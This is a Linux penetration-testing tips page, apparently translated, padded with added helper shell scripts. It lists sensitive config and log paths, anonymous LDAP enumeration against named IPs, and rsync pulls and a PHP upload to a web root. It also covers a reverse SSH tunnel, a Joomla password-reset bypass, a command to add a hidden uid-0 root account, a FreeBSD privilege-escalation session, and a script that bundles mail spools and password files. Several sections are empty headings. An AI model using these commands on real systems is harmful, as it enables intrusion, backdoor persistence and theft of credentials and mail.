This article is a summary of Linux penetration and privilege-escalation techniques. It collects assorted Linux pentesting tricks and privilege-escalation techniques (by version) so that readers can get more done with less effort in future penetration tests.
Some common paths on Linux systems (web roots, Apache/PHP/MySQL/cPanel/Tomcat configuration files and logs). They are the usual targets for arbitrary-file-read and file-inclusion checks, and the first places to look for credentials and virtual-host layout once you have a shell:
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_logaccess_log.old
/usr/local/apache/logs/error_logerror_log.old
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh
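A list like the one above is only useful once you know which entries exist on the target. The following is an added example, not code from the original page: a small POSIX sh filter that reads candidate paths on stdin and reports which exist and are readable by the current user. The optional PREFIX argument is an assumption for convenience, so the same list can be run against a mounted disk image or chroot; the demo tree it builds under mktemp is constructed for the example.

```shell
#!/bin/sh
# Added example: probe a list of candidate paths for existence/readability.
# Usage: probe_paths [PREFIX] < paths.txt
probe_paths() {
  prefix="${1:-}"                     # optional root, e.g. /mnt/image (assumption)
  while IFS= read -r p; do
    # skip blank lines and comments in the candidate list
    case "$p" in ''|'#'*) continue ;; esac
    full="${prefix}${p}"
    if [ -r "$full" ]; then
      if [ -d "$full" ]; then
        printf 'dir      %s\n' "$p"     # readable directory: worth an ls
      else
        printf 'readable %s\n' "$p"     # readable file: config, log or source
      fi
    elif [ -e "$full" ]; then
      # exists but this uid cannot read it: note it for after privilege escalation
      printf 'denied   %s\n' "$p"
    fi
  done
}

# Constructed demo: build a throwaway tree and probe four candidates against it.
demo_probe() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/etc/httpd/conf" "$tmp/var/log/apache2"
  printf 'ServerRoot "/etc/httpd"\n' > "$tmp/etc/httpd/conf/httpd.conf"
  : > "$tmp/var/log/apache2/access.log"
  printf '%s\n' /etc/httpd/conf/httpd.conf /var/log/apache2/access.log \
      /etc/httpd/logs/error_log /var/log/apache2 | probe_paths "$tmp"
  rm -rf "$tmp"
}
```

On a live host run `probe_paths < paths.txt` with the list above saved to a file; the `denied` lines are the ones to revisit after escalating privileges.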
Linux privilege escalation and penetration tips, I. LDAP penetration tips:
Looking at the password/login policy we can see that `file ldap` mode is in use; the LDAP client configuration contains:
base ou=People,dc=unix-center,dc=net
This gives us the ou and dc components, i.e. the search base.
3. Look up the administrator entry
Anonymous form (a bind DN is supplied but no password, which is an unauthenticated bind: servers that accept it treat the session as anonymous, others reject it):
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
With a password (-W prompts for it):
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
4. Fetch 10 user records (-z caps the number of entries returned; -p selects the port when it is not 389):
ldapsearch -h 192.168.2.2 -x -z 10 -p <port>
Hands-on:
1. Return all attributes:
ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
dn: dc=ruc,dc=edu,dc=cn

dn: uid=manager,dc=ruc,dc=edu,dc=cn
objectClass: inetOrgPerson
objectClass: organizationalPerson

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
objectClass: inetOrgPerson
objectClass: organizationalPerson

dn: uid=admin,dc=ruc,dc=edu,dc=cn
objectClass: inetOrgPerson
objectClass: organizationalPerson

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
objectClass: organizationalPerson
objectClass: inetOrgPerson
2. Inspect the root DSE (the server's base entry)
3. Search. A base-scope search with an empty base DN returns the root DSE below: the naming context, supported extensions and controls, SASL mechanisms, accepted LDAP versions, vendor and the TLS cipher list. Note what it gives away: the server is Sun Directory Server 6.2, it still accepts LDAPv2, and supportedSSLCiphers includes NULL, export-grade (40/56-bit), single-DES, RC4 and SSLv2-era (SSL_CK_*) suites, so LDAPS here can be negotiated down to weak or no encryption.
namingContexts: dc=ruc,dc=edu,dc=cn
supportedExtension: 2.16.840.1.113730.3.5.7
supportedExtension: 2.16.840.1.113730.3.5.8
supportedExtension: 1.3.6.1.4.1.4203.1.11.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
supportedExtension: 2.16.840.1.113730.3.5.6
supportedExtension: 2.16.840.1.113730.3.5.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
supportedExtension: 1.3.6.1.4.1.1466.20037
supportedExtension: 1.3.6.1.4.1.4203.1.11.3
supportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
supportedControl: 2.16.840.1.113730.3.4.15
supportedControl: 2.16.840.1.113730.3.4.17
supportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
supportedControl: 1.3.6.1.4.1.1466.29539.12
supportedControl: 2.16.840.1.113730.3.4.12
supportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
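The admin lookup in step 3 and the hands-on output above both come back as LDIF, and the useful facts (account DNs, the naming context, the version, the weak ciphers) are buried in it. The following is an added example, not code from the original page: three small LDIF filters and a wrapper that runs the same anonymous (-x) queries end to end. The sample LDIF is constructed to mirror the page's output so the filters run offline; the host, base DN and server behaviour in ldap_enum are assumptions, and -H is the modern spelling of the page's -h.

```shell
#!/bin/sh
# Added example: LDIF filters for ldapsearch output, plus anonymous enumeration.

# Print the values of one attribute (namingContexts, vendorVersion, ...) from LDIF on stdin.
ldif_attr() {
  awk -v a="$1" 'index($0, a ": ") == 1 { print substr($0, length(a) + 3) }'
}

# Print the dn of every LDIF entry on stdin that carries the given objectClass.
# Entries are blank-line separated and attributes may come in any order, so the
# decision is made when the entry ends (or at EOF for the last one).
ldif_dns_with_class() {
  awk -v oc="$1" '
    /^dn: /                        { dn = substr($0, 5) }
    $0 == ("objectClass: " oc)     { hit = 1 }
    /^$/                           { if (hit) print dn; dn = ""; hit = 0 }
    END                            { if (hit) print dn }
  '
}

# Weak TLS suites in supportedSSLCiphers: NULL (no encryption), EXPORT (40/56-bit),
# single DES (_DES_ but not 3DES), RC4, and SSLv2-era SSL_CK_* suites.
ldif_weak_ciphers() {
  ldif_attr supportedSSLCiphers | grep -E 'NULL|EXPORT|_DES_|RC4|^SSL_CK_'
}

# Live enumeration against a reachable server (assumption): read the naming
# context from the root DSE, then list every inetOrgPerson under it.
ldap_enum() {
  host="$1"
  base=$(ldapsearch -x -LLL -H "ldap://$host" -b "" -s base '(objectClass=*)' namingContexts \
         | ldif_attr namingContexts | head -n 1)
  ldapsearch -x -LLL -H "ldap://$host" -b "$base" '(objectClass=inetOrgPerson)' dn objectClass \
    | ldif_dns_with_class inetOrgPerson
}

# Constructed sample, modelled on the output shown in the text (not a live capture).
sample_ldif() {
  cat <<'EOF'
dn: dc=ruc,dc=edu,dc=cn
objectClass: top
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
objectClass: inetOrgPerson
objectClass: organizationalPerson

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
objectClass: organizationalPerson
objectClass: inetOrgPerson

dn:
namingContexts: dc=ruc,dc=edu,dc=cn
vendorVersion: Sun-Java(tm)-System-Directory/6.2
supportedLDAPVersion: 2
supportedLDAPVersion: 3
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
EOF
}
```

Against a real server, `ldap_enum 192.168.7.33` replaces the two hand-typed searches, and `ldapsearch ... -b "" -s base | ldif_weak_ciphers` gives the cipher findings in one line. A bind that is rejected with unwillingToPerform means the server refuses unauthenticated binds and the -W form is needed.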
Linux privilege escalation and penetration tips, II. NFS penetration tips:
Enumerate IPs:
Linux privilege escalation and penetration tips, III. rsync penetration tips:
1. View the listing on the rsync server (rsync host:: with nothing after the double colon prints the exported modules).
Look at a module's subdirectories (be sure to append a / after the module or directory name; without it rsync lists the entry itself instead of its contents):
rsync 210.51.X.X::htdocs_app/
2. Download the configuration files (or anything else readable) from the rsync server:
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
3. Upload a file to the rsync server. The upload below succeeded; note that rsync overwrites a same-named file whose content differs unless you pass --ignore-existing, so do not assume an upload is non-destructive:
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
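Doing steps 1 to 3 by hand for every module is tedious, and a careless push can clobber the web root. The following is an added example, not code from the original page: POSIX sh helpers that parse the module listing, pull a module, and push a marker file without overwriting anything. The listing parser relies on the daemon's `%-15s<TAB>%s` module-line format (name, padding, a tab, comment), which is why MOTD lines without a tab are dropped; the host and module names in the live helpers, and the constructed sample listing, are assumptions for the example.

```shell
#!/bin/sh
# Added example: rsync daemon enumeration helpers.

# Module lines from `rsync host::` are "name<padding>\tcomment"; MOTD lines
# printed before them normally carry no tab, so split on tab and keep field 1.
rsync_parse_modules() {
  awk -F'\t' 'NF >= 2 { sub(/ +$/, "", $1); print $1 }'
}

# List the modules a daemon exports (host reachable: assumption).
rsync_modules() { rsync "$1::" | rsync_parse_modules; }

# Show a module's top level; the trailing / is what makes rsync list contents.
rsync_ls() { rsync --list-only "$1::$2/"; }

# Pull a whole module into a local directory (created if missing).
rsync_pull() { mkdir -p "$3" && rsync -avz "$1::$2/" "$3/"; }

# Push one harmless marker file. --ignore-existing guarantees nothing already on
# the server is replaced; a read-only module answers with "@ERROR ... read only".
rsync_push_marker() {
  f=$(mktemp) || return 1
  printf 'rsync write test\n' > "$f"
  rsync --ignore-existing -v "$f" "$1::$2/"; rc=$?
  rm -f "$f"
  return $rc
}

# Walk every module: list it, then test whether it accepts writes.
rsync_audit() {
  rsync_modules "$1" | while IFS= read -r m; do
    printf '== %s\n' "$m"
    rsync_ls "$1" "$m" 2>&1 | head -n 5
    if rsync_push_marker "$1" "$m" >/dev/null 2>&1; then
      printf 'module %s is WRITABLE\n' "$m"
    fi
  done
}

# Constructed sample of a daemon's listing: one MOTD line and two modules.
sample_listing() {
  printf 'Welcome to the file server\n'
  printf '%-15s\t%s\n' htdocs_app 'web root for the app' backup 'nightly backups'
}
```

`rsync_audit 210.51.X.X` reproduces the page's three steps for every module; remove the marker file afterwards (it is named after the mktemp result, so note the name from the -v output).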
Linux privilege escalation and penetration tips, IV. squid penetration tips:
Linux privilege escalation and penetration tips, V. SSH port forwarding:
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip
This is a reverse (remote) forward: once the session as cnbird is up, port 44 on the remote host is tunnelled back to port 22 on the machine you ran ssh from, so the remote side can reach your sshd by connecting to localhost:44. -C compresses the tunnel, -f backgrounds ssh after authentication and -N opens no shell, so the command just holds the tunnel. Note that -g only affects local (-L) forwards; for -R the bind address is decided by the remote sshd's GatewayPorts setting, so by default port 44 listens on the remote loopback only and other hosts cannot use it.
Linux privilege escalation and penetration tips, VI. Joomla tips:
Determine the version: the stock sample content gives it away. The default article below ("what languages are supported by joomla 1.5") ships with 1.5 installs:
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47
Reset a password: the confirmation step of the com_user reset flow is
index.php?option=com_user&view=reset&layout=confirm
This only helps where the token check on that confirm step is broken, as it was on 1.5.x before 1.5.6; on a patched site it is just the normal reset form.
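The sample-article trick above tells you "1.5" but not the patch level, which is what decides whether the reset step is exploitable. The following is an added example, not code from the original page: it reads the version out of the XML manifests Joomla ships (language/en-GB/en-GB.xml on 1.5, administrator/manifests/files/joomla.xml on 1.6 and later; both assumed still present, since hardened sites remove them). The manifest parser is exercised on a constructed manifest; joomla_fingerprint assumes curl and a reachable site.

```shell
#!/bin/sh
# Added example: Joomla version fingerprint from shipped XML manifests.

# Extract the first <version>...</version> value from XML on stdin.
joomla_version_from_xml() {
  sed -n 's/.*<version>\([^<]*\)<\/version>.*/\1/p' | head -n 1
}

# Try the known manifest locations in turn; print "version path" for the first hit.
# $1 = site base URL, e.g. http://target/ (assumption: curl available, site reachable)
joomla_fingerprint() {
  base="${1%/}"
  for m in administrator/manifests/files/joomla.xml language/en-GB/en-GB.xml; do
    v=$(curl -fsS --max-time 10 "$base/$m" | joomla_version_from_xml)
    if [ -n "$v" ]; then
      printf '%s %s\n' "$v" "$m"
      return 0
    fi
  done
  return 1
}

# Constructed sample manifest in the 1.5 language-pack format (not from a real site).
sample_manifest() {
  cat <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<install version="1.5" client="site" type="language">
  <name>English(United Kingdom)</name>
  <version>1.5.15</version>
  <creationDate>2009-12-30</creationDate>
</install>
EOF
}
```

Usage: `joomla_fingerprint http://target/` prints e.g. `1.5.15 language/en-GB/en-GB.xml`; anything at or above 1.5.6 rules the reset trick out and you move on.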
Linux privilege escalation and penetration tips, VII. Adding a root user with UID 0 on Linux:
Linux privilege escalation and penetration tips, VIII. FreeBSD local privilege escalation:
The session below is argp's nfs_mount_ex exploit on FreeBSD 7.3. The sysctl check matters: an unprivileged user can only reach the vulnerable mount path when vfs.usermount is non-zero, so on hosts where it is 0 this exploit does not apply.
[argp@julius ~]$ uname -rsi
freebsd 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex
Packing a directory with tar:
1. tar archive (create an uncompressed .tar; each --exclude drops files or directories matching its pattern, and the patterns are matched against the member names as stored, with the leading / stripped, so write them the way they will appear in the archive):
tar -cvf /home/public_html.tar --exclude='*.gif' --exclude='home/public_html/xx/xx/*' /home/public_html
alzip (Korean): alzip -a D:\WEB d:\web*.rar
Note:
On Linux, tar does not decide the archive type by extension.
For compressed archives, tar -ztf *.tar.gz lists the contents and tar -zxf *.tar.gz extracts.
So it is better to use this form, which compresses as it writes:
tar -czf /home/public_html.tar.gz --exclude='*.gif' --exclude='home/public_html/xx/xx/*' /home/public_html
System information collection (the surviving lines of the original script: it copies the mail spools, lists accounts that have a shell and the usual service accounts, uses locate to find password- and config-related files, and bundles everything into one tar; locate only knows what updatedb has indexed, so fall back to find on hosts without a current database):
cp -a /var/mail /tmp/getmail 2>/dev/null
cat /etc/passwd | grep -i sh
for i in oracle mysql tomcat samba apache ftp; do
  cat /etc/passwd | grep -i "$i"
done
locate passwd >/tmp/password 2>/dev/null
locate password >>/tmp/password 2>/dev/null
locate conf >/tmp/sysconfig 2>/dev/null
locate config >>/tmp/sysconfig 2>/dev/null
tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
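Two sections above turn on reading /etc/passwd properly: the "add a UID 0 user" section (whose whole point is an extra uid-0 account) and the collection script, whose `grep -i sh` matches anywhere on the line (the user sshd, for instance) rather than the shell field. The following is an added example, not code from the original page, that serves both: awk filters over passwd-format input, so they run on a copied file as well as the live one. The sample passwd is constructed and not from a real host; the `useradd -o -u 0` line in the comment is the standard way to create such an account.

```shell
#!/bin/sh
# Added example: /etc/passwd checks for the uid-0 backdoor and shell accounts.
# Creating the backdoor is a one-liner (as root):  useradd -o -u 0 -g 0 -d /root -s /bin/bash toor
# or appending "toor:x:0:0::/root:/bin/bash" to /etc/passwd; spotting it is the useful part.

# Every account with uid 0 other than root.
passwd_extra_uid0() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Accounts whose login shell (field 7) is usable; tests the shell field instead
# of grepping the whole line for "sh".
passwd_login_shells() {
  awk -F: '$7 != "" && $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $7 }'
}

# Service accounts worth a second look (the names from the page's for loop),
# with uid and home directory so config paths can be found quickly.
passwd_service_accounts() {
  awk -F: 'tolower($1) ~ /oracle|mysql|tomcat|samba|apache|ftp/ { print $1 ":" $3 ":" $6 }'
}

# Constructed sample (not a real host): note sshd matches "sh" by name only,
# and toor is a second uid-0 account.
sample_passwd() {
  cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:110:MySQL Server:/var/lib/mysql:/bin/false
tomcat:x:107:111::/opt/tomcat:/bin/sh
deploy:x:1000:1000:deploy:/home/deploy:/bin/bash
toor:x:0:0::/root:/bin/bash
EOF
}
```

On a live host: `passwd_extra_uid0 < /etc/passwd` should print nothing; any output is either the backdoor this section describes or something to explain to the owner. `passwd_login_shells < /etc/passwd` is the drop-in for the script's `grep -i sh` line.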